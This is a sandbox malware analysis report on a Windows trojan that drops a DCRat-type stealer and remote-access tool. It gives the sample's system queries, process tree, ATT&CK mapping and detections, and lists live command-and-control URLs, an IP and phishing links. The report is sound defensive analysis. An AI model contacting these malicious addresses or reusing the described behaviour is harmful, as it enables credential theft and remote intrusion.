Source: C:\Users\user\AppData\Roaming\ms_updater.exe; Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\ms_updater.exe; Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\ms_updater.exe; Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\ms_updater.exe; Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\ms_updater.exe; Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\ms_updater.exe; Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\ms_updater.exe; Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\ms_updater.exe; Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
Source: C:\Users\user\AppData\Roaming\ms_updater.exe; Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\ms_updater.exe; Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation (2 times)
Source: C:\Users\user\AppData\Roaming\ms_updater.exe; Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation (2 times)
Source: C:\Users\user\AppData\Roaming\ms_updater.exe; Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation (2 times)
Source: C:\Users\user\AppData\Roaming\ms_updater.exe; Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
Source: C:\Users\user\AppData\Roaming\ms_updater.exe; Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\ms_updater.exe; Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\ms_updater.exe; Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\ms_updater.exe; Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\ms_updater.exe; Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\ms_updater.exe; Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\ms_updater.exe; Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\ms_updater.exe; Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\ms_updater.exe; Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\ms_updater.exe; Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\ms_updater.exe; Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\ms_updater.exe; Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\ms_updater.exe; Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\ms_updater.exe; Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\ms_updater.exe; Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\ms_updater.exe; Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\ms_updater.exe; Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation (2 times)
Source: C:\Users\user\AppData\Roaming\ms_updater.exe; Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation (2 times)
Source: C:\Users\user\AppData\Roaming\ms_updater.exe; Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation (2 times)
Source: C:\Users\user\AppData\Roaming\ms_updater.exe; Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
Source: C:\Users\user\AppData\Roaming\ms_updater.exe; Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\ms_updater.exe; Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\ms_updater.exe; Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\ms_updater.exe; Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\ms_updater.exe; Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\ms_updater.exe; Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\ms_updater.exe; Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\ms_updater.exe; Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\ms_updater.exe; Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\ms_updater.exe; Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\ms_updater.exe; Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\ms_updater.exe; Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\ms_updater.exe; Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\ms_updater.exe; Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\ms_updater.exe; Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\ms_updater.exe; Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\ms_updater.exe; Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\ms_updater.exe; Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\ms_updater.exe; Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\ms_updater.exe; Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\ms_updater.exe; Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\ms_updater.exe; Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\ms_updater.exe; Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\ms_updater.exe; Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\ms_updater.exe; Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\ms_updater.exe; Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\ms_updater.exe; Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\ms_updater.exe; Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\ms_updater.exe; Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\ms_updater.exe; Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\ms_updater.exe; Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\ms_updater.exe; Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\ms_updater.exe; Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\ms_updater.exe; Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\ms_updater.exe; Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\ms_updater.exe; Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\ms_updater.exe; Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\ms_updater.exe; Queries volume information: C:\Windows\Fonts\flat_officeFontsPreview.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\ms_updater.exe; Queries volume information: C:\Windows\Fonts\OFFSYMXL.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\ms_updater.exe; Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
Source: C:\Windows\System32\cmd.exe; Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\1hibLFnCm1.exe; Code function: 0_2_00F5B884 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 0_2_00F5B884
Source: C:\Users\user\AppData\Roaming\ms_updater.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                  Stealing of Sensitive Information

Source: Yara match, File source: 3.0.ms_updater.exe.d90000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.2.1hibLFnCm1.exe.f50000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 00000000.00000002.1701362663.0000000000F8D000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000000.1699967680.0000000000D92000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000002.1759262008.000000000314B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000002.1759262008.0000000002FD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: Process Memory Space: 1hibLFnCm1.exe PID: 6532, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: ms_updater.exe PID: 6768, type: MEMORYSTR
Source: Yara match, File source: C:\Users\user\AppData\Roaming\ms_updater.exe, type: DROPPED

                  Remote Access Functionality

Source: Yara match, File source: 3.0.ms_updater.exe.d90000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.2.1hibLFnCm1.exe.f50000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 00000000.00000002.1701362663.0000000000F8D000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000000.1699967680.0000000000D92000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000002.1759262008.000000000314B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000002.1759262008.0000000002FD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: Process Memory Space: 1hibLFnCm1.exe PID: 6532, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: ms_updater.exe PID: 6768, type: MEMORYSTR
Source: Yara match, File source: C:\Users\user\AppData\Roaming\ms_updater.exe, type: DROPPED
MITRE ATT&CK Matrix (techniques listed per tactic column; the number of matching signatures, where the report shows one, is given in parentheses)

• Reconnaissance: Gather Victim Identity Information, Credentials, Email Addresses, Employee Names, Gather Victim Network Information, Domain Properties, DNS, Network Trust Dependencies
• Resource Development: Scripting (1), Domains, DNS Server, Virtual Private Server, Server, Botnet, Web Services, Serverless
• Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media, External Remote Services, Drive-by Compromise
• Execution: Native API (1), Scheduled Task/Job, At, Cron, Launchd, Scheduled Task, Systemd Timers, Container Orchestration Job
• Persistence: Scripting (1), DLL Side-Loading (1), Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts, Startup Items, Scheduled Task/Job
• Privilege Escalation: Process Injection (12), DLL Side-Loading (1), Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts, Startup Items, Scheduled Task/Job
• Defense Evasion: Masquerading (11), Disable or Modify Tools (1), Virtualization/Sandbox Evasion (131), Process Injection (12), Deobfuscate/Decode Files or Information (11), Obfuscated Files or Information (2), Software Packing (1), DLL Side-Loading (1)
• Credential Access: OS Credential Dumping, LSASS Memory, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials, DCSync, Proc Filesystem
• Discovery: System Time Discovery (1), Security Software Discovery (221), Process Discovery (2), Virtualization/Sandbox Evasion (131), Application Window Discovery (1), File and Directory Discovery (2), System Information Discovery (135), System Owner/User Discovery
• Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC, Windows Remote Management, Cloud Services
• Collection: Archive Collected Data (11), Clipboard Data (1), Data from Network Shared Drive, Input Capture, Keylogging, GUI Input Capture, Web Portal Capture, Credential API Hooking
• Command and Control: Encrypted Channel (1), Non-Application Layer Protocol (2), Application Layer Protocol (12), Protocol Impersonation, Fallback Channels, Multiband Communication, Commonly Used Port, Application Layer Protocol
• Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Traffic Duplication, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel, Exfiltration Over Alternative Protocol
• Impact: Abuse Accessibility Features, Network Denial of Service, Data Encrypted for Impact, Data Destruction, Data Encrypted for Impact, Service Stop, Inhibit System Recovery, Defacement

Behavior Graph ID: 1466966, Sample: 1hibLFnCm1.exe, Startdate: 03/07/2024, Architecture: WINDOWS, Score: 100

Network: 118621cm.n9shteam2.top
Top-level signatures: Snort IDS alert for network traffic; Antivirus detection for URL or domain; Antivirus detection for dropped file; 5 other signatures

Process tree:
• 1hibLFnCm1.exe (started)
  • Dropped: C:\Users\user\AppData\...\ms_updater.exe (PE32)
  • Dropped: C:\Users\user\AppData\Roaming\ms_tool.exe (PE32+)
  • ms_updater.exe (started)
    • Network: 118621cm.n9shteam2.top, 104.21.90.190, ports 49730, 49731, 49732, CLOUDFLARENETUS, United States
    • Dropped: C:\Users\user\Desktop\mHYqxgSr.log (PE32)
    • Dropped: C:\Users\user\Desktop\gOvRVAND.log (PE32)
    • Dropped: C:\Users\user\AppData\...\jClCs9nEU3.bat (DOS)
    • Signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
    • cmd.exe (started)
      • w32tm.exe (started)
      • conhost.exe (started)
      • chcp.com (started)
  • ms_tool.exe (started)
    • conhost.exe (started)
Source | Detection | Scanner | Label
1hibLFnCm1.exe | 71% | ReversingLabs | Win32.Trojan.Zusy
1hibLFnCm1.exe | 100% | Joe Sandbox ML |
Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\jClCs9nEU3.bat | 100% | Avira | BAT/Delbat.C
C:\Users\user\Desktop\gOvRVAND.log | 100% | Avira | HEUR/AGEN.1300079
C:\Users\user\AppData\Roaming\ms_updater.exe | 100% | Avira | HEUR/AGEN.1309961
C:\Users\user\AppData\Roaming\ms_updater.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Roaming\ms_tool.exe | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\ms_updater.exe | 88% | ReversingLabs | ByteCode-MSIL.Trojan.Whispergate
C:\Users\user\Desktop\gOvRVAND.log | 17% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\mHYqxgSr.log | 6% | ReversingLabs |
                  No Antivirus matches
                  No Antivirus matches
Source | Detection | Scanner | Label
http://www.apache.org/licenses/LICENSE-2.0 | 0% | URL Reputation | safe
http://www.fontbureau.com | 0% | URL Reputation | safe
http://www.fontbureau.com/designersG | 0% | URL Reputation | safe
http://www.fontbureau.com/designers/? | 0% | URL Reputation | safe
http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
http://www.fontbureau.com/designers? | 0% | URL Reputation | safe
http://www.tiro.com | 0% | URL Reputation | safe
http://www.fontbureau.com/designers | 0% | URL Reputation | safe
http://www.goodfont.co.kr | 0% | URL Reputation | safe
http://www.carterandcone.coml | 0% | URL Reputation | safe
http://www.sajatypeworks.com | 0% | URL Reputation | safe
http://www.typography.netD | 0% | URL Reputation | safe
http://www.fontbureau.com/designers/cabarga.htmlN | 0% | URL Reputation | safe
http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
http://www.founder.com.cn/cn | 0% | URL Reputation | safe
http://www.fontbureau.com/designers/frere-user.html | 0% | URL Reputation | safe
http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe
http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
http://www.fontbureau.com/designers8 | 0% | URL Reputation | safe
http://www.fonts.com | 0% | URL Reputation | safe
http://www.sandoll.co.kr | 0% | URL Reputation | safe
http://www.urwpp.deDPlease | 0% | URL Reputation | safe
http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
http://www.sakkal.com | 0% | URL Reputation | safe
http://118621cm.n9shteam2.top/ | 100% | Avira URL Cloud | malware
http://118621cm.n9shteam2.top/protecttrackDatalifePrivateCentral.php | 100% | Avira URL Cloud | malware
http://118621cm.n9shteX | 0% | Avira URL Cloud | safe
http://118621cm.n9shteam2.top | 100% | Avira URL Cloud | malware
Name | IP | Active | Malicious | Antivirus Detection | Reputation
118621cm.n9shteam2.top | 104.21.90.190 | true | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
http://118621cm.n9shteam2.top/protecttrackDatalifePrivateCentral.php | true | Avira URL Cloud: malware | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://118621cm.n9shteam2.top/ | ms_updater.exe, 00000003.00000002.1759262008.0000000002FD1000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
http://www.apache.org/licenses/LICENSE-2.0 | ms_updater.exe, 00000003.00000002.1769539098.000000001FFA2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com | ms_updater.exe, 00000003.00000002.1769539098.000000001FFA2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designersG | ms_updater.exe, 00000003.00000002.1769539098.000000001FFA2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/? | ms_updater.exe, 00000003.00000002.1769539098.000000001FFA2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.founder.com.cn/cn/bThe | ms_updater.exe, 00000003.00000002.1769539098.000000001FFA2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers? | ms_updater.exe, 00000003.00000002.1769539098.000000001FFA2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.tiro.com | ms_updater.exe, 00000003.00000002.1769539098.000000001FFA2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers | ms_updater.exe, 00000003.00000002.1769539098.000000001FFA2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.goodfont.co.kr | ms_updater.exe, 00000003.00000002.1769539098.000000001FFA2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.carterandcone.coml | ms_updater.exe, 00000003.00000002.1769539098.000000001FFA2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.sajatypeworks.com | ms_updater.exe, 00000003.00000002.1769539098.000000001FFA2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.typography.netD | ms_updater.exe, 00000003.00000002.1769539098.000000001FFA2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/cabarga.htmlN | ms_updater.exe, 00000003.00000002.1769539098.000000001FFA2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.founder.com.cn/cn/cThe | ms_updater.exe, 00000003.00000002.1769539098.000000001FFA2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://118621cm.n9shteX | ms_updater.exe, 00000003.00000002.1759262008.00000000033A6000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.galapagosdesign.com/staff/dennis.htm | ms_updater.exe, 00000003.00000002.1769539098.000000001FFA2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.founder.com.cn/cn | ms_updater.exe, 00000003.00000002.1769539098.000000001FFA2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/frere-user.html | ms_updater.exe, 00000003.00000002.1769539098.000000001FFA2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.jiyu-kobo.co.jp/ | ms_updater.exe, 00000003.00000002.1769539098.000000001FFA2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/DPlease | ms_updater.exe, 00000003.00000002.1769539098.000000001FFA2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers8 | ms_updater.exe, 00000003.00000002.1769539098.000000001FFA2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://118621cm.n9shteam2.top | ms_updater.exe, 00000003.00000002.1759262008.00000000030D6000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://www.fonts.com | ms_updater.exe, 00000003.00000002.1769539098.000000001FFA2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.sandoll.co.kr | ms_updater.exe, 00000003.00000002.1769539098.000000001FFA2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.urwpp.deDPlease | ms_updater.exe, 00000003.00000002.1769539098.000000001FFA2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.zhongyicts.com.cn | ms_updater.exe, 00000003.00000002.1769539098.000000001FFA2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | ms_updater.exe, 00000003.00000002.1759262008.0000000002FD1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.sakkal.com | ms_updater.exe, 00000003.00000002.1769539098.000000001FFA2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
104.21.90.190 | 118621cm.n9shteam2.top | United States | 13335 | CLOUDFLARENETUS | true
                    Joe Sandbox version:40.0.0 Tourmaline
                    Analysis ID:1466966
                    Start date and time:2024-07-03 15:51:09 +02:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 6m 3s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:14
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:1hibLFnCm1.exe
                    renamed because original name is a hash value
                    Original Sample Name:2196EDD4AD9D7E8CA345339A66E2FED5.exe
                    Detection:MAL
                    Classification:mal100.troj.evad.winEXE@13/8@1/1
                    EGA Information:
                    • Successful, ratio: 100%
                    HCA Information:
                    • Successful, ratio: 68%
                    • Number of executed functions: 150
                    • Number of non-executed functions: 59
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                    • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
                    • Report size exceeded maximum capacity and may have missing behavior information.
                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • Report size getting too big, too many NtReadVirtualMemory calls found.
                    • VT rate limit hit for: 1hibLFnCm1.exe
Time | Type | Description
09:52:06 | API Interceptor | 19x Sleep call for process: ms_updater.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
104.21.90.190 | sA74WsR0pQ.exe | malicious | DCRat, PureLog Stealer, zgRAT | 235566cm.n9shteam2.top/JsupdatedefaultTrafficCentral.php
104.21.90.190 | OhfDz9BBR9.exe | malicious | DCRat, PureLog Stealer, zgRAT | 751120cm.n9shteam2.top/TorequestAuthlongpollServerSqlasyncuniversalPublic.php
104.21.90.190 | yxyZx5FFRS.exe | malicious | DCRat, PureLog Stealer, zgRAT | 044913cm.n9shteam2.top/eternalProtectdefault.php
104.21.90.190 | 0okjnm1gOR.exe | malicious | DCRat, PureLog Stealer, zgRAT | 055442cm.n9shteam2.top/EternalpollProtectTrafficWordpressLocaltempdownloads.php
104.21.90.190 | DCRatBuild(1).exe | malicious | DCRat, PureLog Stealer, zgRAT | 796367cm.n9shteam2.top/ProvidervideoPythondefaultPrivate.php
104.21.90.190 | T7Em03jTPA.exe | malicious | DCRat, PureLog Stealer, zgRAT | 550515cm.n9shteam2.top/eternalUpdatebigloaduniversalDatalife.php
104.21.90.190 | YLICY3GBmX.exe | malicious | DCRat, PureLog Stealer, zgRAT | 842614cm.n9shteam2.top/videosecureasyncDatalifeUploads.php
104.21.90.190 | SecuriteInfo.com.HEUR.Trojan.MSIL.Agent.gen.4285.13890.exe | malicious | DCRat | 739668cm.n9shteam2.top/ImagegeoapiMultiBaselinuxTrackTempuploads.php
104.21.90.190 | b2BVDCUwAF.exe | malicious | DCRat, PureLog Stealer, zgRAT | 421820cm.n9shteam2.top/eternalPythonrequestPollbaseasyncGeneratorwpDlePublic.php
                    No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
CLOUDFLARENETUS | beK7HmoXro.exe | malicious | Unknown | 104.16.184.241
CLOUDFLARENETUS | https://uglb4.roperelo.com/caGPey/ | malicious | Unknown | 104.17.2.184
CLOUDFLARENETUS | tgBNtoWqIp.exe | malicious | AgentTesla, PureLog Stealer | 104.26.13.205
CLOUDFLARENETUS | https://hr.economictimes.indiatimes.com/etl.php?url=https://hr.economictimes.indiatimes.com/etl.php?url=//maansaa.com/new/auth//xp8tpwsulfhjn/%2F/YW5keS5ncmVmcmF0aEBrcHMuY29t | malicious | HTMLPhisher | 104.17.2.184
CLOUDFLARENETUS | 19808bS58f.exe | malicious | AgentTesla | 172.67.74.152
CLOUDFLARENETUS | SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.6737.3783.exe | malicious | AgentTesla | 104.26.13.205
CLOUDFLARENETUS | https://url7304.disco-mailer.net/ls/click?upn=u001.DWLeRfOXStcSaUNphm6ZnGquuezyvOF0FIuLMCSCrIQ9t3e8n3fjexKHJjVTV-2BQUFT1dnxR3BcyXaxz-2BblhjX71zswvTIlAGm31luuFhJgeOGXb3dn9Itq74-2Fe-2BlKg-2Bs0-2F4odRns7kSdvfqBhyqSbrYsnPmx4SeDwlRdlhHbM3UucitnipcwJ1gR7h8DzOIUWsvEslHUA8FsNTNWtsq3Q-2FU-2FPeBtGbo-2Fx3kgcXxAZuE-3DPmkq_5KlZmZKASPtIpYbHU6HHQmxS-2FHe3g010GX01BBBmlalJnMdBClXoEYQADKPWInqgHw-2B5921oa-2Fum9DxIHV8wgOarlsOnYJwzp6I2lNDfeCQdFcL55956QetBM0U9iihLLCXzc7MWVFcQDUwnaU8PUgQFrTwK63nQhJu8ngVllYSJR-2BUamfX7Ej8Gpp4vMWsL8t65JTtpjdFVQ36IgP-2B2LxLYSj9SfdmLAt97TCVXHWn7xANKqYpl-2BYx09SetkszDOjJuUV9L9bqZ-2FbmClOsUrPLylG74RJ8zQAREr7-2BUktmlWKoc8C7oqqTOKv340mZnTc-2FztCVjFgPMm1Bz5lR5AptUVEvvSBboXVGluKKoNkkMFkS-2BmNybyD3Aa-2BX8UZ5s | malicious | HTMLPhisher | 188.114.96.3
